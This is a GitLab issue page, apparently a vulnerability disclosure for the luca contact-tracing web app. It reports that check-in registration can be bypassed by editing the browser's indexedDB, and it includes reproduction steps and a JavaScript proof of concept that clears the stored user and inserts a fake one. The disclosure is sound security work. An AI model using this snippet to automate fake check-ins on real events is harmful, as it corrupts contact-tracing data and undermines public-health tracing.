Skip to content
GitLab
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    • Switch to GitLab Next
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • Web Web
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 13
    • Issues 13
    • List
    • Boards
    • Service Desk
    • Milestones
    • Requirements
  • Deployments
    • Deployments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Terraform modules
    • Model experiments
  • Activity
  • Graph
  • Create a new issue
  • Commits
  • Issue Boards
Collapse sidebar
  • lucaluca
  • WebWeb
  • Issues
  • #1
Project 'lu-ka/cve-2022-40799' was moved to 'rtfmkiesel/cve-2022-40799'. Please update any links and bookmarks that may still have the old path.
Closed
Open
Issue created Apr 14, 2021 by Lasse Wolter@LasseWolter

Fake Checkin without TAN possible

It's possible to check in to an event without entering any details on the webapp. The whole registration process can be circumvented by directly changing entries in the indexedDB of the browser. This poses a massive problem as a malicious user can automate this process and populate an event with lots of fake data. Using a selenium script, I was able to add 50 fake people to a private event (I created myself) within a couple of minutes.
If it's not clear already, the problem with lots of fake data is that it makes tracing actual key contacts infeasible or at least very time-consuming.

Steps to reproduce manually

  1. Get the meeting link from a QR code: e.g. https://app.luca-app.de/webapp/meeting/7dbb0796-c474-4c7b-baf3-dccb3ea233b0#eyJmbiI2ImV0r5QiLCJsbiI6InQifQ== (called Meeting_Link in the following)
  2. Go to the Website referred to by the Meeting_Link
    • you should now arrive at a page where you are prompted to accept the terms and conditions, etc.
  3. Execute a snippet similar to the one below to populate a fake user.
  4. Enter the Meeting_Link in the url-bar and hit enter.
  5. You'll now be checked in to the meeting as the fake user you just populated.

The following code is meant as a proof of concept. It was tested on Firefox(78.9.0esr) and Chrome(89.0.4389.114).
The basis for the snippet was taken from this article (https://developer.chrome.com/docs/devtools/storage/indexeddb/).

let request = indexedDB.open('luca', 33);
request.onsuccess = function(e) {
    let db = e.target.result;
    let trans = db.transaction(["users"], "readwrite");
    let userObjectStore = trans.objectStore('users');
    // Create a fake user
    const user = {
        firstName:'Alice',
        lastName:'Carter',
        version: '3', phoneNumber: '0123999445', email: '',
        street:'jasonstreet', city:'jennigton', houseNumber:'10', zip:'zippy',
        userId:"1d7b4f55-5772-4bff-b9ea-9dc564836126"	
    }

    // Clear db to get rid of current user
    userObjectStore.clear()

    // Add fake user to the db
    let request1 = userObjectStore.put(user);
    request1.onsuccess = function(e) {
        console.log('Added user');
    };
}

If you have any questions or need more evidence. Let me know.

Edited Apr 14, 2021 by Lasse Wolter
Assignee
Assign to
Time tracking